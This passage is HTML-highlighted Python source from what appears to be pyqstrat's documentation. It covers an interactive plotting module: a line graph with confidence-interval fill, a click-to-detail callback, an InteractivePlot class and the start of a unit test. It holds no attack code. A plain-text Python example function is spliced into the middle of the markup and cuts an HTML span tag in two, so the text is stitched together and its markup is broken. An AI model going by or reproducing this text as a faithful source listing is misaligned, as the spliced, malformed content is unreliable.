class=\"o\">.</span><span class=\"n\">add_trace</span><span class=\"p\">(</span><span class=\"n\">trace</span><span class=\"p\">,</span> <span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">secondary_y</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">show_detail</span><span class=\"p\">:</span>\n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">[</span><span class=\"n\">trace_num</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">on_click</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_on_graph_click</span><span class=\"p\">,</span> <span class=\"n\">append</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n <span class=\"n\">trace_num</span> <span class=\"o\">+=</span> <span class=\"mi\">1</span>\n\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">columns</span><span class=\"p\">)</span> <span class=\"o\">&gt;</span> <span class=\"mi\">2</span><span class=\"p\">:</span> <span class=\"c1\"># x, y, ci up and ci down </span>\n 
<span class=\"n\">fill_color</span> <span class=\"o\">=</span> <span class=\"n\">_plotly_color_to_rgb</span><span class=\"p\">(</span><span class=\"n\">color</span><span class=\"p\">)</span>\n <span class=\"n\">fill_color</span> <span class=\"o\">=</span> <span class=\"n\">_lighten_color</span><span class=\"p\">(</span><span class=\"o\">*</span><span class=\"n\">fill_color</span><span class=\"p\">)</span>\n <span class=\"c1\"># we set transparency to 0.5 so we can see lines under the ci fill</span>\n <span class=\"n\">fill_color_str</span> <span class=\"o\">=</span> <span class=\"sa\">f</span><span class=\"s1\">&#39;rgba(</span><span class=\"si\">{</span><span class=\"n\">fill_color</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">,</span><span class=\"si\">{</span><span class=\"n\">fill_color</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">,</span><span class=\"si\">{</span><span class=\"n\">fill_color</span><span class=\"p\">[</span><span class=\"mi\">2</span><span class=\"p\">]</span><span class=\"si\">}</span><span class=\"s1\">,0.5)&#39;</span>\n <span class=\"n\">ci_down</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">2</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">ci_up</span> <span class=\"o\">=</span> <span class=\"n\">line_df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:,</span> <span class=\"mi\">3</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span>\n <span class=\"n\">ci_trace</span> <span class=\"o\">=</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">Scatter</span><span class=\"p\">(</span>\n <span class=\"n\">x</span><span class=\"o\">=</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">concatenate</span><span class=\"p\">([</span><span class=\"n\">x</span><span class=\"p\">,</span> <span class=\"n\">x</span><span class=\"p\">[::</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]]),</span> <span class=\"c1\"># x, then x reversed</span>\n <span class=\"n\">y</span><span class=\"o\">=</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">concatenate</span><span class=\"p\">([</span><span class=\"n\">ci_up</span><span class=\"p\">,</span> <span class=\"n\">ci_down</span><span class=\"p\">[::</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]]),</span> <span class=\"c1\"># upper, then lower reversed</span>\n <span class=\"n\">fill</span><span class=\"o\">=</span><span class=\"s1\">&#39;toself&#39;</span><span class=\"p\">,</span>\n <span class=\"n\">fillcolor</span><span class=\"o\">=</span><span class=\"n\">fill_color_str</span><span class=\"p\">,</span>\n <span class=\"n\">line</span><span class=\"o\">=</span><span class=\"nb\">dict</span><span class=\"p\">(</span><span class=\"n\">color</span><span class=\"o\">=</span><span class=\"s1\">&#39;rgba(255,255,255,0)&#39;</span><span class=\"p\">),</span>\n <span class=\"n\">hoverinfo</span><span class=\"o\">=</span><span class=\"s2\">&quot;skip&quot;</span><span class=\"p\">,</span>\n <span class=\"n\">showlegend</span><span class=\"o\">=</span><span class=\"kc\">False</span><span 
class=\"p\">)</span>\n \n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">add_trace</span><span class=\"p\">(</span><span class=\"n\">ci_trace</span><span class=\"p\">,</span> <span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"n\">line_config</span><span class=\"o\">.</span><span class=\"n\">secondary_y</span><span class=\"p\">)</span>\n <span class=\"n\">trace_num</span> <span class=\"o\">+=</span> <span class=\"mi\">1</span>\n \n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">update_layout</span><span class=\"p\">(</span><span class=\"n\">title</span><span class=\"o\">=</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">title</span><span class=\"p\">,</span> <span class=\"n\">xaxis_title</span><span class=\"o\">=</span><span class=\"n\">xaxis_title</span><span class=\"p\">)</span>\n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">update_layout</span><span class=\"p\">(</span><span class=\"n\">yaxis_title</span><span class=\"o\">=</span><span class=\"n\">yaxis_title</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"n\">secondary_y</span><span class=\"p\">:</span>\n <span class=\"n\">fig_widget</span><span class=\"o\">.</span><span class=\"n\">update_yaxes</span><span class=\"p\">(</span><span class=\"n\">title_text</span><span class=\"o\">=</span><span class=\"n\">yaxis_title</span><span class=\"p\">,</span> <span class=\"n\">secondary_y</span><span class=\"o\">=</span><span class=\"kc\">True</span><span class=\"p\">)</span>\n \n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">fig_widget</span> <span class=\"o\">=</span> <span class=\"n\">fig_widget</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_widget</span> <span class=\"o\">=</span> <span class=\"n\">detail_widget</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">line_data</span> <span class=\"o\">=</span> <span class=\"n\">line_data</span>\n \n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">fig_widget</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_widget</span><span class=\"p\">]</span></div>\n \n <span class=\"k\">def</span> <span class=\"nf\">_on_graph_click</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> \n <span class=\"n\">trace</span><span class=\"p\">:</span> <span class=\"n\">go</span><span class=\"o\">.</span><span class=\"n\">Trace</span><span class=\"p\">,</span> \n <span class=\"n\">points</span><span class=\"p\">:</span> <span class=\"n\">plotly</span><span class=\"o\">.</span><span class=\"n\">callbacks</span><span class=\"o\">.</span><span class=\"n\">Points</span><span class=\"p\">,</span> \n <span class=\"n\">selector</span><span class=\"p\">:</span> <span class=\"n\">plotly</span><span class=\"o\">.</span><span class=\"n\">callbacks</span><span class=\"o\">.</span><span class=\"n\">InputDeviceState</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Callback called by plotly when you click on a point on the graph.</span>\n<span class=\"sd\"> When you click on a point, we display the dataframe with the data we used to 
compute that point.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">points</span><span class=\"o\">.</span><span class=\"n\">xs</span><span class=\"p\">):</span> <span class=\"k\">return</span>\n <span class=\"n\">trace_idx</span> <span class=\"o\">=</span> <span class=\"n\">points</span><span class=\"o\">.</span><span class=\"n\">trace_index</span>\n <span class=\"n\">zvalue</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zvalues</span><span class=\"p\">[</span><span class=\"n\">trace_idx</span><span class=\"p\">]</span>\n <span class=\"n\">_detail_data</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_data</span><span class=\"p\">[</span><span class=\"n\">zvalue</span><span class=\"p\">]</span>\n <span class=\"n\">_detail_data</span> <span class=\"o\">=</span> <span class=\"n\">_detail_data</span><span class=\"p\">[</span><span class=\"n\">_detail_data</span><span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">values</span> <span class=\"o\">==</span> <span class=\"n\">points</span><span class=\"o\">.</span><span class=\"n\">xs</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_detail_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">detail_widget</span><span class=\"p\">,</span> <span class=\"n\">_detail_data</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span><span class=\"p\">)</span></div>\n\n\n<div class=\"viewcode-block\" id=\"InteractivePlot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">InteractivePlot</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Creates a multidimensional interactive plot off a dataframe.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n<div class=\"viewcode-block\" id=\"InteractivePlot.__init__\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot.__init__\">[docs]</a> <span class=\"k\">def</span> <span class=\"fm\">__init__</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span>\n <span class=\"n\">data</span><span class=\"p\">:</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">,</span>\n <span class=\"n\">labels</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span>\n <span class=\"n\">transform_func</span><span class=\"p\">:</span> <span class=\"n\">DataFrameTransformFuncType</span> <span class=\"o\">=</span> <span class=\"n\">SimpleTransform</span><span class=\"p\">(),</span>\n <span class=\"n\">create_selection_widgets_func</span><span 
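
# Illustrative sketch: drawing one line with the class above. The zvalue 'P'
# and the column names are hypothetical.
def _example_line_graph() -> list[widgets.Widget]:
    line_df = pd.DataFrame({'strike': [90, 100], 'pnl': [1.5, 2.5]})
    detail_df = pd.DataFrame({'strike': [90, 90, 100], 'pnl': [1.0, 2.0, 2.5]})
    plot = LineGraphWithDetailDisplay(title='PnL by strike')
    return plot('Strike', 'PnL', [('P', line_df, detail_df)])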
class=\"p\">:</span> <span class=\"n\">CreateSelectionWidgetsFunctype</span> <span class=\"o\">=</span> <span class=\"n\">create_selection_dropdowns</span><span class=\"p\">,</span>\n <span class=\"n\">dim_filter_func</span><span class=\"p\">:</span> <span class=\"n\">DimensionFilterType</span> <span class=\"o\">=</span> <span class=\"n\">simple_dimension_filter</span><span class=\"p\">,</span>\n <span class=\"n\">data_filter_func</span><span class=\"p\">:</span> <span class=\"n\">DataFilterType</span> <span class=\"o\">=</span> <span class=\"n\">simple_data_filter</span><span class=\"p\">,</span>\n <span class=\"n\">stat_func</span><span class=\"p\">:</span> <span class=\"n\">StatFuncType</span> <span class=\"o\">=</span> <span class=\"n\">MeanWithCI</span><span class=\"p\">(),</span>\n <span class=\"n\">plot_func</span><span class=\"p\">:</span> <span class=\"n\">PlotFuncType</span> <span class=\"o\">=</span> <span class=\"n\">LineGraphWithDetailDisplay</span><span class=\"p\">(),</span>\n <span class=\"n\">display_form_func</span><span class=\"p\">:</span> <span class=\"n\">DisplayFormFuncType</span> <span class=\"o\">=</span> <span class=\"n\">display_form</span><span class=\"p\">,</span>\n <span class=\"n\">debug</span><span class=\"o\">=</span><span class=\"kc\">False</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> data: The pandas dataframe to use for plotting</span>\n<span class=\"sd\"> labels: A dict where column names from the dataframe are mapped to user friendly labels. For any column names</span>\n<span class=\"sd\"> not found as keys in this dict, we use the column name as the label. Default None</span>\n<span class=\"sd\"> dim_filter_func: A function that generates the values of a dimension based on other dimensions. For example, if </span>\n<span class=\"sd\"> the user chooses &quot;Put Option&quot; in a put/call dropdown, the valid strikes could change in a Strike </span>\n<span class=\"sd\"> dropdown that follows. Default simple_dimension_filter</span>\n<span class=\"sd\"> data_filter_func: A function that filters the data to plot. For example, if the user chooses &quot;Put Option&quot; in a put/call dropdown,</span>\n<span class=\"sd\"> we could filter the dataframe to only include put options. Default simple_data_filter</span>\n<span class=\"sd\"> stat_func: Once we have filtered the data, we may need to plot some statistics, such as mean and confidence intervals.</span>\n<span class=\"sd\"> In this function, we compute these statistics. Default MeanWithCI()</span>\n<span class=\"sd\"> plot_func: A function that plots the data. 
This could also display detail data used to compute the statistics associated</span>\n<span class=\"sd\"> with each data point.</span>\n<span class=\"sd\"> display_form_func: A function that displays the form given a list of plotly widgets (including the graph widget)</span>\n<span class=\"sd\"> debug: Dont clear forms if this is true so we can see print output</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span> <span class=\"o\">=</span> <span class=\"n\">data</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transform_func</span> <span class=\"o\">=</span> <span class=\"n\">transform_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">create_selection_widgets_func</span> <span class=\"o\">=</span> <span class=\"n\">create_selection_widgets_func</span>\n <span class=\"k\">if</span> <span class=\"n\">labels</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> <span class=\"n\">labels</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span> <span class=\"o\">=</span> <span class=\"n\">labels</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">dim_filter_func</span> <span class=\"o\">=</span> <span class=\"n\">dim_filter_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data_filter_func</span> <span class=\"o\">=</span> <span class=\"n\">data_filter_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">stat_func</span> <span class=\"o\">=</span> <span class=\"n\">stat_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">plot_func</span> <span class=\"o\">=</span> <span class=\"n\">plot_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_form_func</span> <span class=\"o\">=</span> <span class=\"n\">display_form_func</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"p\">{}</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span> <span class=\"o\">=</span> <span class=\"n\">debug</span></div>\n \n<div class=\"viewcode-block\" id=\"InteractivePlot.create_pivot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot.create_pivot\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">create_pivot</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">xcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">ycol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">zcol</span><span class=\"p\">:</span> <span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">dimensions</span><span class=\"p\">:</span> <span class=\"nb\">dict</span><span class=\"p\">[</span><span class=\"nb\">str</span><span class=\"p\">,</span> <span class=\"n\">Any</span><span class=\"p\">])</span> <span 
class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Create the initial pivot</span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> xcol: Column name to use as the x axis in the DataFrame</span>\n<span class=\"sd\"> ycol: Column name to use as the y axis in the DataFrame</span>\n<span class=\"sd\"> zcol: Column name to use for z-values. Each zvalue can be used for a different trace within this plot. For example, a column</span>\n<span class=\"sd\"> called &quot;option_type&quot; could contain the values &quot;American&quot;, &quot;European&quot;, &quot;Bermudan&quot; and we could plot the data for each type</span>\n<span class=\"sd\"> in a separate trace</span>\n<span class=\"sd\"> dimensions: The column names used for filter dimensions. For example, we may want to filter by days to expiration and put/call</span>\n<span class=\"sd\"> The key the column name and the value is the initial value for that column. For example, in a </span>\n<span class=\"sd\"> dropdown for Put/Call we may want &quot;Put&quot; to be the initial value set in the dropdown. Set to None if you </span>\n<span class=\"sd\"> don&#39;t care what initial value is chosen.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xlabel</span> <span class=\"o\">=</span> <span class=\"n\">xcol</span> <span class=\"k\">if</span> <span class=\"n\">xcol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span><span class=\"p\">[</span><span class=\"n\">xcol</span><span class=\"p\">]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ylabel</span> <span class=\"o\">=</span> <span class=\"n\">ycol</span> <span class=\"k\">if</span> <span class=\"n\">ycol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span> <span class=\"k\">else</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span><span class=\"p\">[</span><span class=\"n\">ycol</span><span class=\"p\">]</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zcol</span> <span class=\"o\">=</span> <span class=\"n\">zcol</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span> <span class=\"o\">=</span> <span class=\"n\">xcol</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ycol</span> <span class=\"o\">=</span> <span class=\"n\">ycol</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">create_selection_widgets_func</span><span class=\"p\">(</span><span class=\"n\">dimensions</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">labels</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">update</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">update</span><span class=\"p\">()</span></div>\n \n<div 
class=\"viewcode-block\" id=\"InteractivePlot.update\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.InteractivePlot.update\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">update</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">owner_idx</span><span class=\"p\">:</span> <span class=\"nb\">int</span> <span class=\"o\">=</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Redraw the form using the values of all widgets above and including the one with index owner_idx.</span>\n<span class=\"sd\"> If owner_idx is -1, we redraw everything.</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">select_conditions</span> <span class=\"o\">=</span> <span class=\"p\">[(</span><span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">widget</span><span class=\"o\">.</span><span class=\"n\">value</span><span class=\"p\">)</span> <span class=\"k\">for</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">widget</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">items</span><span class=\"p\">()]</span>\n <span class=\"k\">if</span> <span class=\"n\">owner_idx</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">dim_select_conditions</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">dim_select_conditions</span> <span class=\"o\">=</span> <span class=\"n\">select_conditions</span><span class=\"p\">[:</span><span class=\"n\">owner_idx</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"c1\"># for selecting lower widget options, use value of widgets above </span>\n \n <span class=\"k\">for</span> <span class=\"n\">name</span> <span class=\"ow\">in</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">keys</span><span class=\"p\">())[</span><span class=\"n\">owner_idx</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">:]:</span>\n <span class=\"n\">widget</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"p\">[</span><span class=\"n\">name</span><span class=\"p\">]</span>\n <span class=\"n\">widget_options</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">dim_filter_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">dim_select_conditions</span><span class=\"p\">)</span>\n <span class=\"n\">_logger</span><span class=\"o\">.</span><span class=\"n\">debug</span><span class=\"p\">(</span><span class=\"sa\">f</span><span class=\"s1\">&#39;setting values: </span><span class=\"si\">{</span><span class=\"n\">widget_options</span><span 
class=\"si\">}</span><span class=\"s1\"> on widget: </span><span class=\"si\">{</span><span class=\"n\">name</span><span class=\"si\">}</span><span class=\"s1\">&#39;</span><span class=\"p\">)</span>\n <span class=\"n\">widget</span><span class=\"o\">.</span><span class=\"n\">options</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">dim_filter_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">,</span> <span class=\"n\">name</span><span class=\"p\">,</span> <span class=\"n\">dim_select_conditions</span><span class=\"p\">)</span>\n \n <span class=\"k\">if</span> <span class=\"n\">owner_idx</span> <span class=\"o\">==</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">:</span> <span class=\"k\">return</span>\n \n <span class=\"n\">filtered_data</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data_filter_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">data</span><span class=\"p\">,</span> <span class=\"n\">select_conditions</span><span class=\"p\">)</span>\n <span class=\"n\">transformed_data</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">transform_func</span><span class=\"p\">(</span><span class=\"n\">filtered_data</span><span class=\"p\">)</span>\n <span class=\"n\">lines</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">stat_func</span><span class=\"p\">(</span><span class=\"n\">transformed_data</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xcol</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ycol</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">zcol</span><span class=\"p\">)</span>\n <span class=\"n\">plot_widgets</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">plot_func</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">xlabel</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">ylabel</span><span class=\"p\">,</span> <span class=\"n\">lines</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">display_form_func</span><span class=\"p\">(</span><span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">selection_widgets</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">())</span> <span class=\"o\">+</span> <span class=\"n\">plot_widgets</span><span class=\"p\">,</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">debug</span><span class=\"p\">)</span></div></div>\n \n \n<span class=\"c1\"># unit tests</span>\n<div class=\"viewcode-block\" id=\"TestInteractivePlot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.TestInteractivePlot\">[docs]</a><span class=\"k\">class</span> <span class=\"nc\">TestInteractivePlot</span><span class=\"p\">(</span><span class=\"n\">unittest</span><span class=\"o\">.</span><span 
class=\"n\">TestCase</span><span class=\"p\">):</span>\n<div class=\"viewcode-block\" id=\"TestInteractivePlot.test_interactive_plot\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.interactive_plot.TestInteractivePlot.test_interactive_plot\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">test_interactive_plot</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">):</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">seed</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">)</span>\n <span class=\"n\">size</span> <span class=\"o\">=</span> <span class=\"mi\">1000</span>\n \n <span class=\"n\">dte</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">randint</span><span class=\"p\">(</span><span class=\"mi\">5</span><span class=\"p\">,</span> <span class=\"mi\">10</span><span class=\"p\">,</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">put_call</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">choice</span><span class=\"p\">([</span><span class=\"s1\">&#39;put&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;call&#39;</span><span class=\"p\">],</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">year</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">choice</span><span class=\"p\">([</span><span class=\"mi\">2018</span><span class=\"p\">,</span> <span class=\"mi\">2019</span><span class=\"p\">,</span> <span class=\"mi\">2020</span><span class=\"p\">,</span> <span class=\"mi\">2021</span><span class=\"p\">],</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">delta</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">uniform</span><span class=\"p\">(</span><span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"mf\">0.5</span><span class=\"p\">,</span> <span class=\"n\">size</span><span class=\"p\">)</span>\n <span class=\"n\">delta</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">where</span><span class=\"p\">(</span><span class=\"n\">put_call</span> <span class=\"o\">==</span> <span class=\"s1\">&#39;call&#39;</span><span class=\"p\">,</span> <span class=\"n\">delta</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"n\">delta</span><span class=\"p\">)</span>\n <span class=\"n\">premium</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">abs</span><span class=\"p\">(</span><span class=\"n\">delta</span> <span class=\"o\">*</span> <span class=\"mi\">10</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"n\">dte</span> <span class=\"o\">+</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">random</span><span class=\"o\">.</span><span class=\"n\">normal</span><span 